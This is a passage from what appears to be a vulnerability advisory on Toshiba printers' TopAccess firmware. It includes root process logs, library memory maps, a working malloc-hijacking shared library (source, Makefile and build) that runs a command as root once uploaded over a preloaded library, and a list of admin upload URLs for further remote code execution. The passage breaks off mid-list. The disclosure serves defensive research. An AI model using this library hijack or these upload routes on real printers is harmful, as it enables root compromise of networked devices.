\/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4131 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4130 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4129 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4138 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4137 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f 
\/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4136 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4135 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4134 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4133 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4139 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4140 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:44 CMD: UID=0 PID=4141 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:44 CMD: UID=0 PID=4142 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:45 CMD: UID=0 PID=4143 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:46 CMD: UID=0 PID=4145 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:46 CMD: UID=0 PID=4144 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k 
start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4146 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4147 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4151 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4150 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4149 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4148 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4156 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4155 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4154 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4153 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4152 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:48 CMD: UID=0 PID=4158 |<br 
\/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<\/p>\n<p>We can analyze a newly created Apache process. For example, the Apache<br \/>process with PID 4129 has several libraries loaded, and the code<br \/>implemented in these libraries gets executed:<\/p>\n<p>bash-4.1# cat \/proc\/4129\/maps<br \/>08048000-080bb000 r-xp 00000000 08:02 155908<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/httpd<br \/>080bb000-080bf000 rw-p 00072000 08:02 155908<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/httpd<br \/>080bf000-0833e000 rw-p 00000000 00:00 0 [heap]<br \/>0833e000-08360000 rw-p 00000000 00:00 0 [heap]<br \/>08360000-083e8000 rw-p 00000000 00:00 0 [heap]<br \/>4bc47000-4bc63000 r-xp 00000000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc63000-4bc64000 r&#8211;p 0001b000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc64000-4bc65000 rw-p 0001c000 08:02 11770 \/lib\/ld-2.11.3.so<br \/>4bc67000-4bda6000 r-xp 00000000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda6000-4bda7000 &#8212;p 0013f000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda7000-4bda9000 r&#8211;p 0013f000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bda9000-4bdaa000 rw-p 00141000 08:02 11750 \/lib\/libc-2.11.3.so<br \/>4bdaa000-4bdad000 rw-p 00000000 00:00 0<br \/>4bdaf000-4bdb1000 r-xp 00000000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdb1000-4bdb2000 r&#8211;p 00001000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdb2000-4bdb3000 rw-p 00002000 08:02 11665 \/lib\/libdl-2.11.3.so<br \/>4bdbf000-4bddf000 r-xp 00000000 08:02 139743 \/usr\/lib\/libpcre.so.3.12.1<br \/>4bddf000-4bde0000 rw-p 0001f000 08:02 139743 \/usr\/lib\/libpcre.so.3.12.1<br \/>4bdee000-4bdf0000 r-xp 00000000 08:02 144969 \/usr\/lib\/libcom_err.so.2.1<br \/>4bdf0000-4bdf1000 rw-p 00001000 08:02 144969 \/usr\/lib\/libcom_err.so.2.1<br \/>4bdfa000-4be0c000 r-xp 00000000 08:02 145525 \/usr\/lib\/libz.so.1.2.3<br \/>4be0c000-4be0d000 rw-p 00011000 08:02 145525 \/usr\/lib\/libz.so.1.2.3<br \/>4be0f000-4be12000 r-xp 00000000 
08:02 144902 \/usr\/lib\/libuuid.so.1.3.0<br \/>4be12000-4be13000 rw-p 00002000 08:02 144902 \/usr\/lib\/libuuid.so.1.3.0<br \/>4be15000-4be1c000 r-xp 00000000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be1c000-4be1d000 r&#8211;p 00006000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be1d000-4be1e000 rw-p 00007000 08:02 11732 \/lib\/librt-2.11.3.so<br \/>4be7e000-4be9f000 r-xp 00000000 08:02 142900 \/usr\/lib\/libk5crypto.so.3.1<br \/>4be9f000-4bea0000 rw-p 00021000 08:02 142900 \/usr\/lib\/libk5crypto.so.3.1<br \/>4bea7000-4bead000 r-xp 00000000 08:02 140031<br \/>\/usr\/lib\/libkrb5support.so.0.1<br \/>4bead000-4beae000 rw-p 00005000 08:02 140031<br \/>\/usr\/lib\/libkrb5support.so.0.1<br \/>4c04f000-4c133000 r-xp 00000000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>4c133000-4c137000 r&#8211;p 000e4000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>4c137000-4c138000 rw-p 000e8000 08:02 145085<br \/>\/usr\/lib\/libstdc++.so.6.0.13<br \/>&#8230;<br \/>710a3000-710a5000 r-xp 00000000 08:02 153564<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_file.so<br \/>710a5000-710a6000 rw-p 00001000 08:02 153564<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_file.so<br \/>710a6000-710a9000 r-xp 00000000 08:02 154158<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_core.so<br \/>710a9000-710aa000 rw-p 00002000 08:02 154158<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_authn_core.so<br \/>710aa000-710b4000 r-xp 00000000 08:02 154478<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_dav_fs.so<br \/>710b4000-710b5000 rw-p 00009000 08:02 154478<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_dav_fs.so<br \/>&#8230;<br \/>75674000-75677000 r&#8211;p 00064000 08:02 153751<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>75677000-7567b000 rw-p 00067000 08:02 153751<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>7567b000-756b0000 r-xp 00000000 08:02 154613<br 
\/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>756b0000-756b3000 rw-p 00034000 08:02 154613<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>756b3000-756bd000 r-xp 00000000 08:02 11632 \/lib\/libpam.so.0.82.2<br \/>756bd000-756be000 rw-p 0000a000 08:02 11632 \/lib\/libpam.so.0.82.2<br \/>756be000-76217000 r-xp 00000000 08:02 21362<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>76217000-76258000 rw-p 00b58000 08:02 21362<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>76258000-7625f000 rw-p 00000000 00:00 0<br \/>7625f000-7626a000 r-xp 00000000 08:02 20801<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>7626a000-7626b000 rw-p 0000a000 08:02 20801<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>7626b000-76273000 r-xp 00000000 08:02 20878<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/mod_efiwebserver.so.0<br \/>76273000-76274000 rw-p 00007000 08:02 20878<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/mod_efiwebserver.so.0<br \/>76274000-76275000 &#8212;p 00000000 00:00 0<br \/>76275000-76a74000 rwxp 00000000 00:00 0<br \/>76a74000-76a77000 rw-p 00000000 00:00 0<br \/>76a77000-76a7b000 r-xp 00000000 08:02 11633 \/lib\/libattr.so.1.1.0<br \/>76a7b000-76a7c000 rw-p 00003000 08:02 11633 \/lib\/libattr.so.1.1.0<br \/>76a7c000-76a82000 r-xp 00000000 08:02 11721 \/lib\/libacl.so.1.1.0<br \/>76a82000-76a83000 rw-p 00005000 08:02 11721 \/lib\/libacl.so.1.1.0<br \/>76a83000-76a84000 rw-p 00000000 00:00 0<br \/>76a84000-76af3000 r-xp 00000000 08:02 21782<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>76af3000-76af7000 rw-p 0006f000 08:02 21782<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>76af7000-76b50000 r-xp 00000000 08:02 145519 \/usr\/lib\/libintlc.so.5<br \/>76b50000-76b53000 rw-p 00059000 08:02 145519 \/usr\/lib\/libintlc.so.5<br \/>76b53000-76b5c000 r-xp 00000000 08:02 11622 
\/lib\/libcrypt-2.11.3.so<br \/>76b5c000-76b5d000 r&#8211;p 00008000 08:02 11622 \/lib\/libcrypt-2.11.3.so<br \/>76b5d000-76b5e000 rw-p 00009000 08:02 11622 \/lib\/libcrypt-2.11.3.so<br \/>76b5e000-76b85000 rw-p 00000000 00:00 0<br \/>76b85000-76b97000 r-xp 00000000 08:02 154448<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>76b97000-76b98000 rw-p 00012000 08:02 154448<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>76b98000-76b99000 rw-p 00000000 00:00 0<br \/>76b99000-76b9c000 r-xp 00000000 08:02 154186<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>76b9c000-76b9d000 rw-p 00002000 08:02 154186<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>76b9d000-76bc4000 r-xp 00000000 08:02 154600<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>76bc4000-76bc5000 rw-p 00027000 08:02 154600<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>76bc5000-76c64000 r-xp 00000000 08:02 154326<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>76c64000-76c67000 rw-p 0009f000 08:02 154326<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>76c67000-76c96000 r-xp 00000000 08:02 153499<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>76c96000-76c99000 rw-p 0002e000 08:02 153499<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>76c99000-76c9a000 rw-p 00000000 00:00 0<br \/>76c9a000-76d0b000 r-xp 00000000 08:02 153648<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>76d0b000-76d0d000 rw-p 00070000 08:02 153648<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>76d0d000-76d0e000 rw-p 00000000 00:00 0<br \/>76d0e000-76d4d000 r-xp 00000000 08:02 154400<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>76d4d000-76d4f000 rw-p 0003f000 08:02 154400<br 
\/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>76d4f000-76d55000 r-xp 00000000 08:02 145615 \/usr\/lib\/libirng.so<br \/>76d55000-76d58000 rw-p 00005000 08:02 145615 \/usr\/lib\/libirng.so<br \/>76d58000-76d6b000 r-xp 00000000 08:02 21737<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>76d6b000-76d6c000 rw-p 00012000 08:02 21737<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>76d6c000-77568000 r-xp 00000000 08:02 157246 \/mfp\/lib\/libsvml.so<br \/>77568000-77586000 rw-p 007fc000 08:02 157246 \/mfp\/lib\/libsvml.so<br \/>77586000-77587000 rw-p 00000000 00:00 0<br \/>77587000-775ad000 r-xp 00000000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775ad000-775ae000 r&#8211;p 00025000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775ae000-775af000 rw-p 00026000 08:02 11746 \/lib\/libm-2.11.3.so<br \/>775af000-77624000 r-xp 00000000 08:02 145632<br \/>\/usr\/lib\/libsqlite3.so.0.8.6<br \/>77624000-77626000 rw-p 00074000 08:02 145632<br \/>\/usr\/lib\/libsqlite3.so.0.8.6<br \/>77626000-77627000 rw-p 00000000 00:00 0<br \/>77627000-77695000 r-xp 00000000 08:02 154620<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>77695000-77698000 rw-p 0006e000 08:02 154620<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>77698000-776ad000 r-xp 00000000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776ad000-776ae000 r&#8211;p 00014000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776ae000-776af000 rw-p 00015000 08:02 11629 \/lib\/libpthread-2.11.3.so<br \/>776af000-776b2000 rw-p 00000000 00:00 0<br \/>776b2000-776db000 r-xp 00000000 08:02 153455<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libapr-1.so.0.7.0<br \/>776db000-776dd000 rw-p 00028000 08:02 153455<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libapr-1.so.0.7.0<br \/>776dd000-776fb000 r-xp 00000000 08:02 154622<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libaprutil-1.so.0.6.1<br \/>776fb000-776fd000 rw-p 
0001e000 08:02 154622<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libaprutil-1.so.0.6.1<br \/>776fd000-776fe000 rw-p 00000000 00:00 0<br \/>776fe000-77702000 r-xp 00000000 08:02 154313<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_headers.so<br \/>77702000-77703000 rw-p 00003000 08:02 154313<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/mod_headers.so<br \/>77703000-77712000 r-xp 00000000 00:0d 10594<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77712000-77714000 rw-p 0000e000 00:0d 10594<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77714000-77715000 rw-p 00000000 00:00 0<br \/>77715000-77720000 r-xp 00000000 00:0d 11406<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77720000-77722000 rw-p 0000a000 00:0d 11406<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<\/p>\n<p>Because of weak permissions, we can overwrite hundreds of libraries to<br \/>get Remote Code Execution.<\/p>\n<p>We can overwrite the 2 libraries that will be loaded by default by the<br \/>programs running inside the printers:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<\/p>\n<p>These 2 libraries export Intel-optimized functions.<\/p>\n<p>Exported functions found in the LD_PRELOAD&#8217;ed libraries:<\/p>\n<p>kali% nm -D<br \/>\/home\/user\/research\/printers\/topaccess\/4.50-latest-version\/4.50-new-version\/extract\/home\/SYSROM_SRC\/build\/release\/lib\/libGetNameInfoInterface.so.0<br \/>0000cf40 A __bss_start<br \/>00009150 T __cacheSize<br \/>w __cxa_finalize@GLIBC_2.1.3<br \/>U dlsym@GLIBC_2.0<br \/>0000cf40 A _edata<br \/>0000cfc0 A _end<br \/>00009d04 T _fini<br \/>00002340 T getnameinfo<br \/>00002290 T getNameInfoWrapper<br \/>w __gmon_start__<br \/>00002088 T _init<br \/>00009cb0 T __intel_f2int<br \/>00002530 T _intel_fast_memcpy<br \/>00002440 T _intel_fast_memcpy.A<br \/>00002500 T _intel_fast_memcpy.H<br \/>00002470 T _intel_fast_memcpy.J<br \/>000024a0 T 
_intel_fast_memcpy.M<br \/>000024d0 T _intel_fast_memcpy.P<br \/>000026f0 T _intel_fast_memset<br \/>00002600 T _intel_fast_memset.A<br \/>00002660 T _intel_fast_memset.H<br \/>00002630 T _intel_fast_memset.J<br \/>00002690 T _intel_fast_memset.M<br \/>000026c0 T _intel_fast_memset.P<br \/>000027cc T __intel_memcpy<br \/>000033fd T __intel_memset<br \/>000027c0 T __intel_new_memcpy<br \/>00003b10 T __intel_new_memcpy_P3<br \/>000033f0 T __intel_new_memset<br \/>00004a90 T __intel_new_memset_P3<br \/>000051e0 T __intel_sse2_memset<br \/>00005850 T __intel_sse2_rep_memset<br \/>00005dd0 T __intel_ssse3_memcpy<br \/>00007dc0 T __intel_ssse3_rep_memcpy<br \/>w _Jv_RegisterClasses<br \/>U memcpy@GLIBC_2.0<br \/>U memset@GLIBC_2.0<br \/>U pthread_create@GLIBC_2.1<br \/>U pthread_join@GLIBC_2.0<br \/>kali% nm -D<br \/>\/home\/user\/research\/printers\/topaccess\/4.50-latest-version\/4.50-new-version\/extract\/home\/SYSROM_SRC\/build\/release\/lib\/libGetNameInfoInterface.so.0<br \/>0000cf40 A __bss_start<br \/>00009150 T __cacheSize<br \/>w __cxa_finalize@GLIBC_2.1.3<br \/>U dlsym@GLIBC_2.0<br \/>0000cf40 A _edata<br \/>0000cfc0 A _end<br \/>00009d04 T _fini<br \/>00002340 T getnameinfo<br \/>00002290 T getNameInfoWrapper<br \/>w __gmon_start__<br \/>00002088 T _init<br \/>00009cb0 T __intel_f2int<br \/>00002530 T _intel_fast_memcpy<br \/>00002440 T _intel_fast_memcpy.A<br \/>00002500 T _intel_fast_memcpy.H<br \/>00002470 T _intel_fast_memcpy.J<br \/>000024a0 T _intel_fast_memcpy.M<br \/>000024d0 T _intel_fast_memcpy.P<br \/>000026f0 T _intel_fast_memset<br \/>00002600 T _intel_fast_memset.A<br \/>00002660 T _intel_fast_memset.H<br \/>00002630 T _intel_fast_memset.J<br \/>00002690 T _intel_fast_memset.M<br \/>000026c0 T _intel_fast_memset.P<br \/>000027cc T __intel_memcpy<br \/>000033fd T __intel_memset<br \/>000027c0 T __intel_new_memcpy<br \/>00003b10 T __intel_new_memcpy_P3<br \/>000033f0 T __intel_new_memset<br \/>00004a90 T __intel_new_memset_P3<br \/>000051e0 T 
__intel_sse2_memset<br \/>00005850 T __intel_sse2_rep_memset<br \/>00005dd0 T __intel_ssse3_memcpy<br \/>00007dc0 T __intel_ssse3_rep_memcpy<br \/>w _Jv_RegisterClasses<br \/>U memcpy@GLIBC_2.0<br \/>U memset@GLIBC_2.0<br \/>U pthread_create@GLIBC_2.1<br \/>U pthread_join@GLIBC_2.0<br \/>kali%<\/p>\n<p>An attacker can create a new library and export a function that will<br \/>be used by any program, for example `malloc()`.<\/p>\n<p>A custom library has been written, hijacking the control flow of the<br \/>`malloc()` function:<\/p>\n<p>kali% cat Makefile<br \/>all:<br \/>rm \/home\/user\/research\/printers\/topaccess\/malloc\/malloc.so<br \/>gcc -o malloc.so -m32 -shared -fPIC malloc.c<\/p>\n<p>kali% cat malloc.c<br \/>#include &lt;stdio.h&gt;<br \/>#include &lt;unistd.h&gt;<br \/>#include &lt;stdlib.h&gt;<br \/>#include &lt;dlfcn.h&gt;<\/p>\n<p>void *malloc(size_t size)<br \/>{<br \/>static void *(*fptr)(size_t) = NULL;<\/p>\n<p>if (fptr == NULL)<br \/>{<br \/>fptr = (void *(*)(size_t))dlsym(RTLD_NEXT, &#8220;malloc&#8221;);<br \/>if (fptr == NULL)<br \/>{<br \/>printf(&#8220;dlsym: %s\\n&#8221;, dlerror());<br \/>return NULL;<br \/>}<br \/>}<\/p>\n<p>system(&#8220;LD_PRELOAD=&#8221; id &gt; \/dev\/shm\/id&#8221;);<\/p>\n<p>return (*fptr)(size);<br \/>}<br \/>kali% make<br \/>rm \/home\/user\/research\/printers\/topaccess\/malloc\/malloc.so<br \/>gcc -o malloc.so -m32 -shared -fPIC malloc.c<br \/>kali% ls -la<br \/>total 32<br \/>drwx&#8212;&#8212; 2 user user 4096 May 13 11:04 .<br \/>drwx&#8212;&#8212; 4 user user 4096 May 13 11:02 ..<br \/>-rw&#8212;&#8212;- 1 user user 112 May 13 11:04 Makefile<br \/>-rw&#8212;&#8212;- 1 user user 398 May 13 11:03 malloc.c<br \/>-rwx&#8212;&#8212; 1 user user 14696 May 13 11:04 malloc.so<br \/>kali%<\/p>\n<p>When uploading this library as<br \/>`\/ramdisk\/al\/libGetAddtInfoInterface.so` or<br \/>`\/ramdisk\/al\/libGetNameInfoInterface.so`, the `malloc()` function will<br \/>be executed by some programs running inside the 
printers and the id<br \/>command will be executed as root (the output will be written into<br \/>`\/dev\/shm\/id`).<\/p>\n<p>A side effect is that a lot of programs will also crash. The execution<br \/>of the malicious payload will still work.<\/p>\n<p>By targeting only specific functions used by Apache or by specific<br \/>programs inside the printer, it is possible to avoid crashing these<br \/>programs.<\/p>\n<p>### Other ways to get Remote Code Execution<\/p>\n<p>An attacker can use the other vulnerabilities to get Remote Code Execution:<\/p>\n<p>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using insecure PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_PRELOAD<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure LD_LIBRARY_PATH<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using<br \/>insecure permissions for 106 programs<br \/>&#8211; &#8211; Local Privilege Escalation and Remote Code Execution using CISSM<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>An attacker can overwrite any insecure file (including programs<br \/>running as root and Python code).<\/p>\n<p>## Details &#8211; Multiple Post-authenticated Remote Code Executions as root<\/p>\n<p>Toshiba printers provide several ways to upload files using the admin<br \/>web interface.<\/p>\n<p>The vulnerability in this chapter is similar to Pre-authenticated<br \/>Remote Code Execution as root or apache and multiple Local Privilege<br \/>Escalations, but it requires authentication on the TopAccess interface.<\/p>\n<p>When an administrator is authenticated, it is possible to upload<br \/>documents within the web interface using the maintenance interface:<\/p>\n<p>&#8211; &#8211; Upload of driver files;<br \/>&#8211; &#8211; Upload of MAC PPD Files;<br \/>&#8211; &#8211; Upload of Unix Filters;<br \/>&#8211; &#8211; Upload of Driver 
packages;<br \/>&#8211; &#8211; Upload of address book, mailboxes and templates;<br \/>&#8211; &#8211; Upload of SSL certificates;<br \/>&#8211; &#8211; &#8230;<\/p>\n<p>Several web pages with upload forms can be found in the admin interface:<\/p>\n<p>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UnixList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UploadList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/xmlformat\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/MacList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/import\/ImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Languages\/InstallLanguagesUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/AdminRegistration\/ImageIconManagementFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Cloning\/CloneFileUpload.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/DriverCustomize.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/MacList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/PointAndPrintList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UnixList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/uploadsoft\/UploadList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/xmlformat\/XmlFormatList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/import\/ImportListFrame.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/maintenance\/backup\/BackupList.html<br \/>&#8211; &#8211; http:\/\/printer-ip\/Administration\/Security\/Certificates\/CertUpload.html<br \/>&#8211; &#8211; 
